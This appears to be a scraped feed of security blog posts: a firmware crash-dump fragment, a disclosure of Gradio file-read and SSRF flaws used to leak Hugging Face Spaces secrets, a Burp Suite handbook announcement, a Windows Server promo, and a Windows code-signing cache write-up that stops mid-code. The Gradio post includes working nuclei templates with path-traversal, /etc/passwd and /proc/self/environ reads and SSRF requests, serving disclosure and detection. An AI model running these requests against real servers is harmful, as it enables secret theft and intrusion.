0x7efe7298│+0x0000: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"    ← $sp
0x7efe729c│+0x0004: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a0│+0x0008: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a4│+0x000c: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72a8│+0x0010: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72ac│+0x0014: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72b0│+0x0018: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x7efe72b4│+0x001c: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:arm:THUMB ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414140
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "unicorn", stopped 0x41414140 in ?? (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────

The research shows that a misconfiguration in firmware can lead to multiple code execution paths and reducing the remote attack surfaces, especially from developer tools, can greatly reduce the risk to an IoT device. We recommend that manufactures of devices verify that the unicorn binary is not running or enabled as a service. This would mitigate all of the code execution paths described above. If you have any devices utilizing Augentix SoCs that have this binary, we’d love to hear about it.

Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces

14 June 2024 at 13:05

On Friday, May 31, the AI company Hugging Face disclosed a potential breach where attackers may have gained unauthorized access to secrets stored in their Spaces platform.

This reminded us of a couple of high severity vulnerabilities we disclosed to Hugging Face affecting their Gradio framework last December. When we reported these vulnerabilities, we demonstrated that they could lead to the exfiltration of secrets stored in Spaces.

Hugging Face responded in a timely way to our reports and patched Gradio. However, to our surprise, even though these vulnerabilities have long been patched, these old vulnerabilities were, up until recently, still exploitable on the Spaces platform for apps running with an outdated Gradio version.

This post walks through the vulnerabilities we disclosed and their impact, and our recent effort to work with Hugging Face to harden the Spaces platform after the reported potential breach. We recommend all users of Gradio upgrade to the latest version, whether they are using Gradio in a Hugging Face Space or self-hosting.

Background

Gradio is a popular open-source Python-based web application framework for developing and sharing AI/ML demos. The framework consists of a backend server that hosts a standard set of REST APIs and a library of front-end components that users can plug in to develop their apps. A number of popular AI apps use Gradio such as the Stable Diffusion Web UI and Text Generation Web UI.

Users have several options for sharing Gradio apps: hosting it in a Hugging Face Space; self-hosting; or using the Gradio share feature, which exposes their machine to the Internet using a Gradio-provided proxy URL similar to ngrok.

A Hugging Face Space provides the foundation for hosting an app using Hugging Face’s infrastructure, which runs on Kubernetes. Users use Git to manage their source code and a Space to build, deploy, and host their app. Gradio is not the only way to develop apps – the Spaces platform also supports apps developed using Streamlit. Docker, or static HTML.

Within a Space, users can define secrets, such as Hugging Face tokens or API keys, that can be used by their app. These secrets are accessible to the application as environment variables. This method for secret storage is a step up from storing secrets in source code.

File Read Vulnerabilities in Gradio

Last December we disclosed to Hugging Face a couple of high severity vulnerabilities, CVE-2023-51449 and CVE-2024-1561, that allow attackers to read arbitrary files from a server hosting Gradio, regardless of whether it was self-hosted, shared using the share feature, or hosted in a Hugging Face space. In a Hugging Face space, it was possible for attackers to exploit these vulnerabilities to access secrets stored in environment variables by reading the /proc/self/environ pseudo-file.

CVE-2023-51449

CVE-2023-51449, which affects Gradio versions 4.0 – 4.10, is a path traversal vulnerability in the file endpoint. This endpoint is supposed to only serve files stored within a Gradio temporary directory. However we found that the check for making sure a requested file was contained within the temporary directory was flawed.

The check on line 935 to prevent path traversal doesn’t account for subdirectories inside the temp folder. We found that we could use the upload endpoint to first create a subdirectory within the temp directory, and then traverse out from that subdirectory to read arbitrary files using the ../ or %2e%2e%2f sequence.

To read environment variables, one can request the /proc/self/environ pseudo-file using a HTTP Range header:

Interestingly, CVE-2023-51449 was introduced in version 4.0 as part of a refactor and appears to be a regression of a prior vulnerability CVE-2023-34239. This same exploit was tested to work against Gradio versions prior to 3.33.

Detection

Below is a nuclei template for testing this vulnerability:


id: CVE-2023-51449
info:
  name: CVE-2023-51449
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
  reference:
    - https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-51449
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311

        -----------------------------250033711231076532771336998311
        Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
        Content-Type: application/octet-stream

        a
        -----------------------------250033711231076532771336998311--

      - |
        GET /file={{download_path}}{{path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\\[\"(.+)okmijnuhbygv\"\\]"

    payloads:
      path:
        - ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
        - ../../../../../../../../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

Timeline

  • Dec. 17, 2023: Horizon3 reports vulnerability over email to Hugging Face.
  • Dec. 18, 2023: Hugging Face acknowledges report
  • Dec. 20, 2023: GitHub advisory published. Issue fixed in Gradio 4.11. (Note Gradio used this advisory to cover two separate findings, one for the LFI we reported and another for a SSRF reported by another researcher)
  • Dec. 22, 2023: CVE published
  • Dec. 24, 2023: Hugging Face confirms fix over email with commit https://github.com/gradio-app/gradio/issues/6816

CVE-2024-1561

CVE-2024-1561 arises from an input validation flaw in the component_server API endpoint that allows attackers to invoke internal Python backend functions. Depending on the Gradio version, this can lead to reading arbitrary files and accessing arbitrary internal endpoints (full-read SSRF). This affects Gradio versions 3.47 to 4.12. This is notable because the last version of Gradio 3 is 3.50.2, and a number of users haven’t made the transition yet to Gradio 4 because of the major refactor between versions 3 and 4. The vulnerable code:

On line 702, an arbitrary user-specified function is invoked against the specified component object.

For Gradio versions 4.3 – 4.12, the move_resource_to_block_cache function is defined in the base class of all Component classes. This function copies arbitrary files into the Gradio temp folder, making them available for attackers to download using the file endpoint. Just like CVE-2023-51449, this vulnerability can also be used to grab the /proc/self/environ pseudo-file containing environment variables.

In Gradio versions 3.47 – 3.50.2, a similar function called make_temp_copy_if_needed can be invoked on most Component objects.

In addition, in Gradio versions 3.47 to 3.50.2 another function called download_temp_copy_if_needed can be invoked to read the contents of arbitrary HTTP endpoints and store the results into the temp folder for retrieval, resulting in a full-read SSRF.

There are other component-specific functions that can be invoked across different Gradio versions, and their effects vary per component.

Detection

The following nuclei templates can be used to test for CVE-2024-1561.

File read against Gradio 4.3-4.12:


id: CVE-2024-1561-4x
info:
  name: CVE-2024-1561-4x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this template works for Gradio versions 4.3-4.12
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"

    payloads:
      path:
        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

File read against Gradio 3.47 – 3.50.2:


id: CVE-2024-1561-3x
info:
  name: CVE-2024-1561-3x
  author: nvn1729
  severity: high
  description: Gradio LFI when auth is not enabled, this version should work for versions 3.47 - 3.50.2
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "{{path}}", "fn_name": "make_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"
    
    attack: clusterbomb
    payloads:
      fuzz_component_id:
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20
      path:
        - c:\\windows\\win.ini
        - /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
      
      - type: status
        status:
          - 200

Exploiting the SSRF against Gradio 3.47-3.50.2:


id: CVE-2024-1561-3x-ssrf
info:
  name: CVE-2024-1561-3x-ssrf
  author: nvn1729
  severity: high
  description: Gradio Full Read SSRF when auth is not enabled, this version should work for versions 3.47 - 3.50.2
  reference:
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  tags: cve2024, cve, gradio, lfi

http:
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{fuzz_component_id}}", "data": "http://{{interactsh-url}}", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: download_path
        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"
    
    payloads:
      fuzz_component_id:
        - 1
        - 2
        - 3
        - 4
        - 5
        - 6
        - 7
        - 8
        - 9
        - 10
        - 11
        - 12
        - 13
        - 14
        - 15
        - 16
        - 17
        - 18
        - 19
        - 20

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        part: body
        regex:
          - <html><head></head><body>[a-z0-9]+</body></html>

Timeline

If you look up CVE-2024-1561 in NVD or MITRE, you’ll see that it was filed by the Huntr CNA and credited to another security researcher on the Huntr platform. In fact, that Huntr report was filed after our original report to Hugging Face, and after the vulnerability was already patched in the mainline. Due to various delays in getting a CVE assigned, Huntr assigned a CVE for this issue prior to us getting a CVE. Here is the actual timeline:

  • Dec. 20, 2023: Horizon3 reports vulnerability over email to Hugging Face.
  • Dec. 24, 2023: Hugging Face acknowledges report
  • Dec. 27, 2023: Fix merged to mainline with commit https://github.com/gradio-app/gradio/pull/6884
  • Dec. 28, 2023: Huntr researcher reports same issue on the Huntr platform here https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
  • Jan 3, 2024: Hugging Face confirms to Horizon3 over email that the vulnerability is fixed with commit https://github.com/gradio-app/gradio/pull/6884 in version 4.13
  • Feb. 2024: Huntr gets confirmation from Gradio this issue is already fixed. Huntr may not have realized it was fixed prior to the report to them.
  • Mar. 17, 2024: Horizon3 checks with Gradio on filing a CVE
  • Mar. 23, 2024: Horizon3 files CVE request with MITRE
  • Apr. 15, 2024: Huntr published CVE-2024-1561
  • May 5, 2024: After multiple follow ups, MITRE assigns CVE-2024-34511 to this vulnerability
  • May 10, 2024: We ask MITRE to reject CVE-2024-34511 as a duplicate after realizing Huntr already had a CVE assigned.

Leaking Secrets in Hugging Face Spaces

As demonstrated above, both vulnerabilities CVE-2023-51449 and CVE-2024-1561 can be used to read arbitrary files from a server hosting Gradio. This includes the /proc/self/environ file on Linux systems containing environment variables. At the time of disclosing these vulnerabilities to Hugging Face, we set up a Hugging Face Space at https://huggingface.co/spaces/nvn1729/hello-world and showed that these vulnerabilities could be exploited to leak secrets configured for the Space. Below is an example of what the environment variable output looks like (with some data redacted). The user configured secrets and variables are shown in bold.


PATH=REDACTED^@HOSTNAME=REDACTED@GRADIO_THEME=huggingface^@TQDM_POSITION=-1^@TQDM_MININTERVAL=1^@SYSTEM=spaces^@SPACE_AUTHOR_NAME=nvn1729^@SPACE_ID=nvn1729/hello-world^@SPACE_SUBDOMAIN=nvn1729-hello-world^@CPU_CORES=2^@mysecret=mysecretvalue^@MEMORY=16Gi^@SPACE_HOST=nvn1729-hello-world.hf.space^@SPACE_REPO_NAME=hello-world^@SPACE_TITLE=Hello World^@myvariable=variablevalue^^@REDACTED

When we heard of the potential breach from Hugging Face on Friday, May 31, we were curious if it was possible that these old vulnerabilities were still exploitable on the Spaces platform. We started up the Space and were surprised to find that it was still running the same vulnerable Gradio version, 4.10, from December.

And the vulnerabilities we had reported were still exploitable. We then the checked the Gradio versions for other Spaces and found that a substantial portion were out of date, and therefore potentially vulnerable to exfiltration of secrets.

It turns out that the Gradio version used by an app is generally fixed at the time a user develops and publishes an app to a Space. A file called README.md controls the Gradio version in use (3.50.2 in this example). It’s up to users to manually update their Gradio version.

We reported the issue to Hugging Face and highlighted that old Gradio Spaces could be exploited by bad actors to steal secrets. Hugging Face responded promptly and implemented measures over the course of a week to harden the Spaces environment:

Hugging Face configured new rules in their “web application firewall” to neutralize exploitation of CVE-2023-51449, CVE-2024-1561, and other file read vulnerabilities reported by other researchers (CVE-2023-34239, CVE-2024-4941, CVE-2024-1728, CVE-2024-0964) that could be used to leak secrets. We iteratively tested different methods for exploiting all of these vulnerabilities and provided feedback to Hugging Face that was incorporated to harden the WAF.

Hugging Face sent out email notifications to users of Gradio Spaces recommending that users upgrade to the latest version.

Along with e-mail notifications, Hugging Face updated their Spaces user interface to highlight if a Space is running an old Gradio version.

Timeline

  • Dec. 18, 2023: We set up a test Space running Gradio 4.10 and demonstrate leakage of Space secrets as part of reporting CVE-2023-51449 and CVE-2024-1561
  • May 31, 2024: Hugging Face discloses potential breach
  • June 2, 2024: We revive the test Space and confirm it’s still running Gradio 4.10 and can be exploited to leak Space secrets. We verify there exist other Spaces running old versions.  We report this to Hugging Face.
  • June 3 – 9, 2024: Hugging Face updates their WAF based on our feedback to prevent exploitation of Gradio vulnerabilities that can lead to leakage of secrets.
  • June 7, 2024: Hugging Face sends out emails to users running outdated versions of Gradio, and rolls out an update to their user interface recommending that users upgrade.

We appreciate Hugging Face’s prompt response in improving their security posture.

Recommendations

In Hugging Face’s breach advisory, they noted that they proactively revoked some Hugging Face tokens that were stored as secrets in Spaces, and that users should refresh any keys or tokens as well. In this post, we’ve shown that old vulnerabilities in Gradio can still be exploited to leak Spaces secrets, and even if they are rotated, an attacker can still get access to them. Therefore, in addition to rotating secrets, we recommend users double check if they are running an outdated Gradio version and upgrade to the latest version if required.

To be clear: We have no idea whether this method of exploiting Gradio led to secrets being leaked in the first place, but the path we’ve shown in this post was available to attackers up til recently.

To upgrade a Gradio Space, a user can visit the README.md file in their Space and click “Upgrade”, as shown below:

Alternatively, users could stop storing secrets in their Gradio Space or enable authentication for their Gradio Space.

While Hugging Face did harden their WAF to neutralize exploitation, we caution users from thinking that this will truly protect them. At best, it’ll prevent exploitation by script kiddies using off-the-shelf POCs. It’s only a matter of time before bypasses are discovered.

Finally for users of Gradio that are exposing it to the Internet using a Gradio share URL or self-hosting, we recommend enabling authentication and also ensuring it’s updated to the latest version.

Sign up for a free trial and quickly verify you’re not exploitable.

Start Your Free Trial

The post Exploiting File Read Vulnerabilities in Gradio to Steal Secrets from Hugging Face Spaces appeared first on Horizon3.ai.

Announcing the Burp Suite Professional chapter in the Testing Handbook

14 June 2024 at 13:00

By Maciej Domanski

Based on our security auditing experience, we’ve found that Burp Suite Professional’s dynamic analysis can uncover vulnerabilities hidden amidst the maze of various target components. Unpredictable security issues like race conditions are often elusive when examining source code alone.

While Burp is a comprehensive tool for web application security testing, its extensive features may present a complex barrier. That’s where we, Trail of Bits, stand ready with our new Burp Suite guide in the Testing Handbook. This chapter aims to cut through this complexity, providing a clear and concise roadmap for running Burp Suite and achieving quick and tangible results.

The new chapter starts with an essential discussion on where Burp can support you. This section provides in-depth insights into how Burp can enhance your ability to conduct security testing, especially in the face of challenges like obfuscated front-end code, intricate infrastructural components, variations in deployment environments, or client-side data handling issues.

The chapter provides a step-by-step guide to setting up Burp for your specific application quickly and effectively. It guides you through minimizing setup errors and ensuring potential vulnerabilities are not overlooked—a game-changer in terms of your security auditing outcomes. We also explore using key Burp extensions to supercharge your application testing processes and discover more vulnerabilities.

Our Burp chapter concludes with numerous professional tips and tricks to empower you to perform advanced practices and to reveal hidden Burp characteristics that could revolutionize your security testing routine.

Real-world knowledge, real-world results

The Testing Handbook series encapsulates our extensive real-world knowledge and experience. Our insights go beyond mere documentation recitations, offering tried-and-tested strategies from the Trail of Bits team’s security auditing experience.

With this new chapter, we hope to impart the knowledge and confidence you need to dive into Burp Suite and truly harness its potential to secure your web applications.

Ready to supercharge your security testing with Burp Suite? Dive into the chapter now.

Windows Server 2025 and beyond

 

Windows Server 2025 is the most secure and performant release yet! Download the evaluation now!

Looking to migrate from VMware to Windows Server 2025? Contact your Microsoft account team!

The 2024 Windows Server Summit was held in March and brought three days of demos, technical sessions, and Q&A, led by Microsoft engineers, guest experts from Intel®, and our MVP community. For more videos from this year’s Windows Server Summit, please find the full session list here.

 

This article focuses on what’s new and what’s coming in Windows Server 2025.

 

What's new in Windows Server 2025

Get a closer look at Windows Server 2025. Explore improvements, enhancements, and new capabilities. We'll walk you through the big picture and offer a guide to which Windows Server Summit sessions will help you learn more.

 

What’s ahead for Windows Server

What’s in it for you? Get a summary of the most important features coming in Windows Server 2025 that will make your life easier and your work more impactful. In this fireside chat, Hari Pulapaka, Windows Server GM and Jeff Woolsey, Principal PM manager, provide an overview of what’s next, and provide their thoughts on how Windows Server can help you stay ahead.

 

CVE-2024-20693: Windows cached code signature manipulation

14 June 2024 at 00:00

In the Patch Tuesday update of April 2024, Microsoft released a fix for CVE-2024-20693, a vulnerability we reported. This vulnerability allowed manipulating the cached signature signing level of an executable or DLL. In this post, we’ll describe how we found this issue and what the impact could be on Windows 11.

Background

Last year, we started a project to improve our knowledge of Windows internals, specifically about local vulnerabilities such as privilege escalation. The best way to get started on a new target is to look at recent publications from other researchers. This gives the most up to date overview of the security design, allows looking for variants of the vulnerability or even bypasses for the implemented fixes.

The most helpful prior work we found was the presentation “The Print Spooler Bug that Wasn’t in the Print Spooler” at OffensiveCon 2023 by Maddie Stone and James Forshaw from Google. This talk describes a Windows privilege escalation exploit discovered in the wild.

Privilege escalation using an impersonated device map and isolation-aware DLLs

In case you haven’t watched this presentation, we’ll summarize it here: a highly privileged Windows service that handles requests on behalf of lower-privileged processes can impersonate the requesting process, in order to make all operations performed by the highly privileged service be performed with the permissions and privileges of the lower-privileged process. This is a great security measure, as it means the highly privileged service can never accidentally do something the lower-privileged process would not be able to do itself.

One thing to note is that a (lowly privileged) process on Windows can change its device map, which can be used to redirect a device letter such as C: to a different location (for example a specific subfolder, like C:\fakeroot). This changed device map is one of the aspects included in impersonation. This is quite risky: what if the impersonating service attempts to load a DLL while impersonating another process which has set a different device map? That issue was already reported in 2015 by James Forshaw and fixed.

However, the logic for determining which file to load for LoadLibrary can be quite complicated if it involves side-by-side assemblies (WinSxS). On Windows, it’s possible to install multiple different versions of a DLL and manifest files can be used to specify which version to load for a specific application. DLL files can also include an embedded manifest to specify which version of its versioned dependencies to load. These are called “isolation aware” DLLs.

The core of the exploited vulnerability is the fact that when an isolation aware DLL file is loaded, the impersonated device map would be used to find the manifests of its dependencies. By combining this with a path traversal in the manifest file, it was possible to make a privileged service load a DLL from a folder on disk specified by the lower privileged process. Loading this malicious DLL would then lead to privilege escalation (impersonation by design no longer provides any security when malicious code is loaded, because it can revert the impersonation). For this attack to work, the impersonating service must load an isolation aware DLL, which depends on at least one other DLL.

The fix applied by Microsoft to address the issue covered in the Maddie Stone and James Forshaw presentation was to apply a new mitigation to disable the loading of WinSxS manifests using the impersonated device map, but only for processes that have specifically opted-in. This flag was only set for a few services that were known to be vulnerable. This means that a lot of privileged services were left that could be examined for the same issue. Very helpfully, Maddie and James explained how to configure Process Monitor on Windows how to find these issues:

Screenshot from the presentation showing how to set up a Process Monitor filter.

So, we set to work finding issues like this. We made a list of isolation aware DLLs with at least one dependency on another library, set up the Process Monitor filters as described and wrote a simple PowerShell script (using the NtObjectManager PowerShell module also from James Forshaw) to enumerate all RPC services and attempt to call all methods. Then, we cross-referenced the libraries loaded under impersonation with the list of DLLs using a manifest.

We found a single match: wscsvc.dll!

wscsvc.dll

When calling the RPC endpoint with number 12 on this service (which takes no arguments), it indirectly loads gpedit.dll. This is an isolation aware DLL, which depends on (among others) comctl32.dll. We replicated the setup from the in-the-wild exploit, creating a new directory at C:\fakeroot, added the required manifest and DLL files, redirecting C: to C:\fakeroot and then sending this COM message.

And it works… almost. Process Monitor shows that it opens and reads our fake DLL file, but never gets to “Load Image”, which is the step where the actual code execution starts. Somehow, it was resolving our DLL but refusing to execute its code.

Then we found out that the process associated with the wscsvc.dll service, namely the “Windows Security Center Service”, is categorized as a PPL (Protected Process Light). This means that it places restrictions on the code signature of DLL files it loads.

Protected Process (Light)

Windows recognizes a number of different protection levels to protect processes from being “modified” (such as terminating it, modifying memory, adding new threads) by a process at a lower protection level. This is used, for example, to make it harder to disable AV tools or important Windows services.

As of Windows 11, the protection levels are:

Level Value
App 8
WinSystem 7
WinTcb 6
Windows 5
Lsa 4
Antimalware 3
CodeGen 2
Authenticode 1
None 0

Whether an operation is allowed is determined by a table known as RtlProtectedAccess. We have summarized it as follows:

→Target ↓Requesting Authenti- code CodeGen Anti- malware Lsa Windows WinTcb WinSystem App
Authenticode
CodeGen
Antimalware
Lsa
Windows
WinTcb
WinSystem

It can roughly be summarized as follows: Windows, WinTcb and WinSystem form a hierarchy (Windows < WinTcb < WinSystem). Authenticode, CodeGen, Antimalware and Lsa are separate groups that only allow access from processes in the same group or the Win-* hierarchy. We are not sure how “App” is used, it is new in Windows 10 and has not been documented very well.

In addition, there is the difference between a Protected Process (PP) and a Protected Process Light (PPL): a Protected Process can modify a Protected Process Light (based on the table above), but not the other way around. The some examples are Antimalware PPLs for third-party security tools and WinTCB or Windows at PP for critical Windows services (like managing DRM). Keep in mind that these protection levels are also in addition to all other authorization checks (such as integrity levels) in Windows. For more information about protected processes, see https://itm4n.github.io/lsass-runasppl/.

Note that this is not considered a defended security boundary by Microsoft: a process running as Administrator can load an exploitable kernel driver, which can be used to modify all protected processes. As admin to kernel is not a security boundary according to Microsoft, protected processes can also not be a security boundary for Administrators.

Aside from the restrictions on being manipulated by other processes, protected processes are also limited in what DLLs they may load. For example, anti-malware services may only load DLLs signed with the same codesigning certificate or by Microsoft itself. From Protecting anti-malware services:

DLL signing requirements

[A]ny non-Windows DLLs that get loaded into the protected service must be signed with the same certificate that was used to sign the anti-malware service.

For protected processes in general, they are only allowed to load a DLL signed with a specific Signature Level. Signature levels are assigned to a DLL based on the certificate and its issuer used for the code signature. The exact rules for when which PPL level may load a DLL with a specific signature level are quite complicated (and these rules can even be customized with a secure boot policy) and we’ll not go into those here. But to summarize: only certain Windows-signed DLLs were allowed to be loaded into our target service.

At this point we had two options: find a different service with the same WinSxS under impersonation vulnerability, or try to bypass the signing of Windows DLL files. The most likely to yield results would of course have been to look for a different service, but the goal of the project was to understand Windows internals better, so we decided to spend a little bit of time on understanding how DLL files are signed.

Sector 7 deciding what to research.

DLL signatures

The codesigning process for PE files is known as Authenticode. Just like TLS, it is based on X.509 certificates. An Authenticode signature is generated by computing the hash of the PE file (leaving out certain fields that will change after signing, such as the checksum and the section for the signature itself), then signing that hash and appending it to the file with the certificate chain (and optionally a timestamp).

Because signature verification can be slow and loading DLLs happens often on Windows, a caching method has been implemented for code signatures. For a signed DLL or EXE file, the result of the certificate verification can be stored in an NTFS Extended Attribute (EA) named $KERNEL.PURGE.ESBCACHE. The $KERNEL part of this name means that only the Windows kernel is allowed to set or change this EA. The PURGE part means that the EA will be automatically removed if the contents of the file are modified. This means that it should not be possible to set this EA from usermode or to modify the file without removing the EA. This only works on journaled NTFS partitions, as the PURGE functionality depends on the journal. Note that nothing in this EA binds it to the file: these attributes contain the journal ID, but nothing like a file path or inode number.

In 2017, James Forshaw had reported that it was possible to race the application of this EA: by making the file refer to a catalog, it was possible to slow down the verification enough to modify the contents of the file in between the verification of the signature and the application of the EA. As this was already found a while ago, it was unlikely that doing this was going to work.

We experimented with placing the file on an SMB share instead and attempting to rewrite the contents in between the verification and image loading, but this wasn’t working either (the file was only being read once). But looking at our Wireshark capture and the decompiled code in CI.DLL that parses the $KERNEL.PURGE.ESBCACHE extended attribute we noticed something standing out:

Screenshot from Wireshark showing an ioctl request with ID 0x90390.

A $KERNEL.PURGE.ESBCACHE extended attribute should only be trusted on the local volume, as a filesystem on (for example) a USB drive or mounted disk image could have been manipulated by the user. There was a check in the code we assumed was meant to check for this and only allow the local boot disk using the function CipGetVolumeFlags.

__int64 __fastcall CipGetVolumeFlags(__int64 file, int *attributeInformation, _BYTE *containerState)
{
  int *v6; // x20
  BOOL shouldFree; // w21
  int ioctlResponse; // w9
  unsigned int err; // w19
  unsigned int v10; // w19
  __int64 buffer; // x0
  int outputBuffer; // [xsp+0h] [xbp-40h] BYREF
  int returnedOutputBufferLength; // [xsp+4h] [xbp-3Ch] BYREF
  int fsInformation[14]; // [xsp+8h] [xbp-38h] BYREF

  outputBuffer = 0;
  returnedOutputBufferLength = 0;
  memset(fsInformation, 0, 48);
  v6 = fsInformation;
  shouldFree = 0;
  // containerState will be set based on the response to the ioctl with ID 0x90390LL on the file
  if ( (int)FsRtlKernelFsControlFile(file, 0x90390LL, 0LL, 0LL, &outputBuffer, 4LL, &returnedOutputBufferLength) >= 0 )
    ioctlResponse = outputBuffer;
  else
    ioctlResponse = 0;
  outputBuffer = ioctlResponse;
  *containerState = ioctlResponse & 1;
  // attributeInformation will be set based on the IoQueryVolumeInformation for FileFsAttributeInformation (5)
  err = IoQueryVolumeInformation(file, 5LL, 48LL, fsInformation, &returnedOutputBufferLength);
  if ( err == 0x80000005 )
  {
    // Retry in case the buffer is too small
    v10 = fsInformation[2] + 8;
    buffer = ExAllocatePool2(258LL, (unsigned int)(fsInformation[2] + 8), 'csIC');
    v6 = (int *)buffer;
    if ( !buffer )
      return 0xC000009A;
    shouldFree = 1;
    err = IoQueryVolumeInformation(file, 5LL, v10, buffer, &returnedOutputBufferLength);
  }
  if ( (err & 0x80000000) == 0 )
    *attributeInformation = *v6;
  if ( shouldFree )
    ExFreePoolWithTag(v6, 'csIC');
  return err;
}

This was being called from CipGetFileCache:

__int64 __fastcall CipGetFileCache(
        __int64 fileObject,
        unsigned __int8 a2,
        int a3,
        unsigned int *a4,
        _DWORD *a5,
        unsigned __int8 *a6,
        int *a7,
        __int64 a8,
        _DWORD *a9,
        _DWORD *a10,
        __int64 a11,
        __int64 a12,
        _QWORD *a13,
        __int64 *a14)
{
  __int64 eaBuffer_1; // x20
  unsigned __int64 v17; // x22
  unsigned int fileAttributes; // w25
  unsigned int attributeInformation_FileSystemAttributes; // w19
  unsigned int err; // w19
  unsigned int err_1; // w0
  __int64 v22; // x4
  __int64 v23; // x3
  __int64 v24; // x2
  __int64 v25; // x1
  int containerState_1; // w10
  unsigned int v28; // w8
  __int64 eaBuffer; // x0
  _DWORD *v30; // x23
  unsigned __int8 *v31; // x24
  int v32; // w8
  char v33; // w22
  const char *v34; // x10
  __int16 v35; // w9
  char v36; // w8
  unsigned int v37; // w25
  int v38; // w9
  int IsEnabled; // w0
  unsigned int v40; // w8
  unsigned int ContextForReplay; // w0
  __int64 v42; // x2
  _QWORD *v43; // x11
  int v44; // w10
  __int64 v45; // x9
  unsigned __int8 containerState; // [xsp+10h] [xbp-C0h] BYREF
  char v47[7]; // [xsp+11h] [xbp-BFh] BYREF
  _DWORD *v48; // [xsp+18h] [xbp-B8h]
  unsigned __int8 *v49; // [xsp+20h] [xbp-B0h]
  unsigned __int8 v50; // [xsp+28h] [xbp-A8h]
  unsigned __int64 v51; // [xsp+30h] [xbp-A0h] BYREF
  unsigned int v52; // [xsp+38h] [xbp-98h]
  int attributeInformation; // [xsp+3Ch] [xbp-94h] BYREF
  int v54; // [xsp+40h] [xbp-90h] BYREF
  int lengthReturned_1; // [xsp+44h] [xbp-8Ch] BYREF
  int lengthReturned; // [xsp+48h] [xbp-88h] BYREF
  int v57; // [xsp+4Ch] [xbp-84h]
  __int64 v58; // [xsp+50h] [xbp-80h]
  __int64 v59; // [xsp+58h] [xbp-78h]
  __int64 v60; // [xsp+60h] [xbp-70h]
  _QWORD *v61; // [xsp+68h] [xbp-68h]
  int *v62; // [xsp+70h] [xbp-60h]
  int eaList[8]; // [xsp+78h] [xbp-58h] BYREF
  char fileBasicInformation[40]; // [xsp+98h] [xbp-38h] BYREF

  [...]

